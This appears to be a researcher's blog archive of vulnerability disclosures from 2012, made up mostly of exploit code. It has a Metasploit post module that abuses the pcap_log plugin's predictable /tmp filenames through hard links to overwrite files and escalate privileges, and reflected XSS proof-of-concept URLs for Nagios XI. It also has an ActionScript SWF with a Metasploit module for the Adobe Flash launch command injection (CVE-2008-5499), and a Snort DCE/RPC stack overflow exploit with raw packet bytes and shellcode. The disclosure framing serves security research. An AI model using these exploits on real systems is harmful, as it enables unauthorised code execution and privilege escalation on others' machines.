UPDATED 29 October 2012
Finessed exploit now included in metasploit -
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/escalate/metasploit_pcaplog.rb
================
0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================
Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug
which can further be leveraged to insert user-controlled data resulting in
potential escalation of privileges
================
Timeline:
================
16 July 2012 - Reported
16 July 2012 - Acknowledged & fixed by HD Moore
https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740
16 July 2012 - Public disclosure
================
Details:
================
By default the pcap_log plugin (plugins/pcap_log.rb) logs pcap to a file like
'/tmp/msf3-session_2012-07-16_15-15-35.pcap'. This is of course is
predictable so a simple 'ln' in advance to a privileged file will
result in arbitrary file overwrite. The module has to run as root.
Here's the fun part - by sending packets we can then insert our own
content into any file (surrounded by pcap headers and all
the other packets)
======
Sample PoC (needs work)
modules/post/linux/exploit/metasploit_pcaplog.rb
======
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info={})
super( update_info( info,
'Name' => 'Metasploit plugin "pcap_log" arbirary file overwrite / privilege escalation',
'Description' => %q{ Post exploitation module to exploit 0A29-12-2, a vulnerability in metasploit pcap_log plugin.
Depending on the file you choose to overwrite, you will need to netcat/telnet etc. the data
that you wish to appear in the file.},
'License' => MSF_LICENSE,
'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],
'Version' => '$Revision$',
'Platform' => [ 'linux' ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'References' =>
[
[ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html' ],
[ 'URL', 'https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740' ]
],
'DisclosureDate'=> "July 16 2012"
))
register_options([
OptInt.new('NUMBER', [true, 'Number of seconds to prime /tmp/ with', nil]),
OptString.new('FILE', [true, 'File to overwrite with PCAP data', nil]),
], self.class)
end
def link(t)
file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [
"msf3-session", t.year, t.month, t.mday, t.hour, t.min, t.sec
]
fname = ::File.join("/tmp", file_part)
retval = session.shell_command("/bin/ln #{datastore['FILE']} #{fname}")
end
# Run Method for when run command is issued
def run
for i in 0..(datastore['NUMBER'])
link(Time.now+i)
end
print_status("Set #{datastore['NUMBER']} links.")
end
def cleanup
print_status("Manual cleanup required: rm -f /tmp/msf3-session*")
end
end
Monday 16 July 2012
Thursday 14 June 2012
0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0
================
0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================
Multiple reflected XSS vulnerabilities exist within Nagios XI < 2011R3.0
Fixes detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT
================
Timeline:
================
16 May 2012 - Reported to Nagios Enterprises
16 May 2012 - Acknowledged
16 May 2012 - Reported fixed
04 June 2012 - Nagios XI 2011R3.0 released
14 June 2012 - Public disclosure
================
Details:
================
Page: /includes/components/graphexplorer/visApi.php
POC: http://site/nagiosxi/includes/components/graphexplorer/visApi.php?type=bar&div=</script><script>alert('0a29')</script>&opt=topalerts
Page: /nagiosxi/perfgraphs/index.php
POC: http://site/nagiosxi/perfgraphs/index.php?view='><script>alert('0a29')</script>&start=&end=&startdate=&enddate=
Wednesday 16 May 2012
CVE-2008-5499 : modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
<code>
/* Compile: mtasc -version 8 -swf Exploit.swf -main -header 800:600:20 Exploit.as Author: 0a29406d9794e4f9b30b3c5d6702c708 / Unknown / metasploit PoC: http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as */ import flash.external.ExternalInterface; class Exploit { public function randname(newLength:Number):String{ var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; var alphabet:Array = a.split(""); var randomLetter:String = ""; for (var i:Number = 0; i < newLength; i++){ randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)]; } return randomLetter; } public function exploit() { var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt"; var loadVars:LoadVars = new LoadVars(); loadVars.onData = function(str:String):Void { if (str) { if (_global.ASnative(2201, 1)("airappinstaller")) { _global.ASnative(2201, 2)("airappinstaller", "; " + str); } } else { // FAIL } } loadVars.load(path); } public function Exploit() { exploit(); } static function main() { var ex : Exploit; ex = new Exploit(); } }## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability', 'Description' => %q{ This module exploits a vulnerability in Adobe Flash Player for Linux, version 10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows command execution when the browser loads a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. The victim must have Adobe AIR installed for the exploit to work. This module was tested against version 10.0.12.36 (10r12_36). }, 'License' => MSF_LICENSE, 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version ], 'References' => [ ['CVE', '2008-5499'], ['OSVDB', '50796'], ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'], ['URL', 'http://www.securityfocus.com/bid/32896/exploit'] ], 'DefaultOptions' => { 'HTTP::compression' => 'gzip', 'HTTP::chunked' => true }, 'Platform' => 'unix', # so unix cmd exec payloads are ok 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Automatic', {}], ], 'DisclosureDate' => 'Dec 17 2008', 'DefaultTarget' => 0)) end def exploit path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" ) fd = File.open( path, "rb" ) @swf = fd.read(fd.stat.size) fd.close super end def on_request_uri(cli, request) msg = "#{cli.peerhost.ljust(16)} #{self.shortname}" trigger = @swf trigger_file = rand_text_alpha(rand(6)+3) + ".swf" obj_id = rand_text_alpha(rand(6)+3) if request.uri.match(/\.swf/i) print_status("#{msg} Sending Exploit SWF") send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' }) return end if request.uri.match(/\.txt/i) send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) return end html = <<-EOS <html> <head> </head> <body> <center> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"> <param name="movie" value="#{get_resource}#{trigger_file}" /> <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"> </embed> </object> </center> </body> </html> EOS print_status("#{msg} Sending HTML...") send_response(cli, html, { 'Content-Type' => 'text/html' }) end end
</code>
CVE-2006-5276 : modules/exploits/linux/ids/snortdcerpc.rb
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Capture
def initialize(info = {})
super(update_info(info,
'Name' => 'Snort 2.6.1. DCE/RPC Packet Reassembly Stack Buffer Overflow (Linux x86)',
'Description' => %q{
This exploits the buffer overflow found in Snort 2.6.1 DCE/RPC
packet processor. This particular module is capable of
exploiting the flaw on x86 Linux systems that do not have the
noexec stack option set.
},
'Author' => [
'Trirat Puttaraksa', #POC
'0a29406d9794e4f9b30b3c5d6702c708' #module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14774 $',
'References' =>
[
[ 'CVE', '2006-5276' ],
[ 'OSVDB', '32094' ],
[ 'BID', '22616' ],
[ 'URL', 'http://iss.net/threats/257.html' ],
[ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html']
],
'Privileged' => true,
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'linux',
'Targets' =>
[
[ 'Snort 2.6.1 - Redhat 8',
{
'Ret' => 0xbffff120,
'Arch' => [ ARCH_X86 ],
'Space' => 124,
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 19 2007'
))
register_options([
OptString.new('INTERFACE', [true, 'The interface to inject the packet','eth0']),
OptAddress.new('DSTIP', [true, 'The destination IP address']),
OptAddress.new('SRCIP', [true, 'The source IP address']),
], self.class)
deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
end
def exploit
begin
check_pcaprub_loaded
# SMB packet borrowed from http://www.milw0rm.com/exploits/3391
# NetBIOS Session Service
smbreq = "\x00\x00\x04\xab"
# SMB Header -
smbreq += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
smbreq += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
smbreq += "\x00\x08\x30\x00"
# Tree Connect AndX Request
smbreq += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
smbreq += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
smbreq += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
smbreq += "\x3f\x3f\x3f\x3f\x3f\x00"
# NT Create AndX Request
smbreq += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
smbreq += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
smbreq += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
smbreq += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
smbreq += "\x63\x00\x00\x00"
# Write AndX Request #1
smbreq += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
smbreq += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
smbreq += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00"
smbreq += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
smbreq += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
smbreq += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
smbreq += "\x2b\x10\x48\x60\x02\x00\x00\x00"
# Write AndX Request #2
smbreq += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
smbreq += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee"
smbreq += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44"
smbreq += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
# The following address overwrites RET and points into our shellcode
smbreq += [target.ret].pack('V')
smbreq += "\xcc" * 16 #pad
smbreq += "\x90" * 4 #land
enc = payload.encoded
smbreq += enc
smbreq += "\x90" * (334 - enc.length) #pad
p = PacketFu::TCPPacket.new
p.ip_saddr = datastore['SRCIP']
p.ip_daddr = datastore['DSTIP']
p.tcp_sport = 139
p.tcp_flags.ack = 1
p.tcp_flags.psh = 1
p.tcp_dport = 139
p.tcp_win = 3072
p.payload = smbreq
p.recalc
p
print_status("Sending DCE/RPC packet from #{p.ip_saddr}:#{p.tcp_sport} to #{p.ip_daddr}:#{p.tcp_dport} ")
open_pcap
interface = datastore['INTERFACE']
capture.inject(p.to_s)
close_pcap
rescue ::Exception => e
print_error("Failed: #{e}")
end
end
end
Subscribe to:
Posts (Atom)